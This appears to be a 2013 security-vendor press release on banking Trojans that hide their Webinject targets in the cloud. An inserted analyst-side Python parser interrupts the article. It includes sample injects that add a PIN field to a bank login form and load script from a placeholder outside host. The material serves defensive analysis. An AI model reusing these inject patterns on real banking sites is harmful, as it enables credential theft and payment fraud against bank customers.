Spying via the cloud for cash

Banking Trojans disguise attack targets in the cloud

09/11/2013 | Bochum (Germany) 

Experts at G Data SecurityLabs have discovered a new eCrime trend: malware from the cloud. Perpetrators are using cloud technology to disguise their attacks. In a current eCrime campaign, G Data experts were able to prove the use of this "stealth cloud" technology for the first time. The malware involved is spyware known as "information stealers". It targets online banking customers, actively intercepting and manipulating payment traffic on the customer side. With this new process, malware authors have moved some of these malicious functions to the cloud. Those elements are practically invisible to analysts, making it harder to design countermeasures. G Data customers are protected against these attacks by the BankGuard technology that is part of the G Data solutions for both business and private clients.

Previous operation
Banking Trojans traditionally use configuration files stored on the infected computer. These configuration files contain the addresses of the targeted websites and the code, called the Webinject, that the banking Trojan inserts into those websites. This injected code is then responsible for, for example, stealing access data and personal information.

Stealth Cloud technology
With this new functionality, individual parts of the malware configuration are moved to the cloud. The malware authors intend this to prevent analysis by antivirus vendors and banks.
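The following analyst-side parser is an added example; it is not G Data's code and the page describes no file format. It assumes the widely documented Zeus-style Webinject configuration syntax (set_url / data_before / data_inject / data_after / data_end), extracts the targeted site addresses from a constructed sample, and flags entries whose injected code is not embedded in the configuration but loaded from a host other than the targeted site, which is the kind of "moved to the cloud" entry that a purely local analysis of the configuration would miss. All hostnames are placeholders.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample in the Zeus-style Webinject syntax (an assumption: the
# page names no format). Hostnames are placeholders, not real targets.
SAMPLE_CONFIG = """
set_url https://online.examplebank.test/login* GP
data_before
<form id="login"*>
data_end
data_inject
<input type="text" name="pin" placeholder="PIN">
data_end
data_after
</form>
data_end

set_url https://secure.examplebank.test/transfer* GP
data_before
<head>
data_end
data_inject
<script src="https://cdn-static.example-cloud.test/js/jquery.min.js"></script>
data_end
data_after
</head>
data_end
"""


@dataclass
class Inject:
    """One Webinject entry: the targeted URL pattern and its three code sections."""
    target: str
    flags: str
    before: str = ""
    inject: str = ""
    after: str = ""

    def remote_sources(self) -> list[str]:
        """External script/iframe sources referenced by the injected code."""
        return re.findall(r'src=["\']?(https?://[^"\'\s>]+)', self.inject, re.I)

    def is_cloud_loaded(self) -> bool:
        """True if the real payload is fetched from a host other than the target site,
        i.e. the local config only carries a loader and the content lives elsewhere."""
        target_host = urlparse(self.target.rstrip("*")).hostname
        return any(urlparse(u).hostname != target_host for u in self.remote_sources())


def parse_webinjects(text: str) -> list[Inject]:
    """Parse a Zeus-style Webinject configuration into Inject records."""
    injects: list[Inject] = []
    current = None
    section = None
    buf: list[str] = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url"):
            parts = stripped.split(None, 2)
            current = Inject(target=parts[1], flags=parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif stripped in ("data_before", "data_inject", "data_after"):
            section = stripped[len("data_"):]  # "before", "inject" or "after"
            buf = []
        elif stripped == "data_end" and current is not None and section:
            setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return injects


def summarize(text: str) -> list[tuple[str, bool, list[str]]]:
    """(target, cloud_loaded?, remote sources) per entry: the IoC list an analyst wants."""
    return [(i.target, i.is_cloud_loaded(), i.remote_sources()) for i in parse_webinjects(text)]


if __name__ == "__main__":
    for target, cloud, sources in summarize(SAMPLE_CONFIG):
        print(f"{target}\n  cloud-loaded payload: {cloud}\n  remote sources: {sources}")
```

The first entry carries its injected form field inline, so everything needed for analysis is in the local file. The second entry only inserts a script tag pointing at an unrelated host; the targeted site address is still recoverable from the configuration, but the actual injected behaviour is not, which is exactly why the remote hosts should be collected as indicators alongside the target URLs.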

Graph 1: Classical Man in the Browser attack

Graph 2: Information Stealer with Cloud technology

For detailed technical information, visit the G Data SecurityBlog: http://blog.gdatasoftware.com/blog/article/banking-trojans-disguise-attack-targets-in-the-cloud.html


Daniëlle van Leeuwen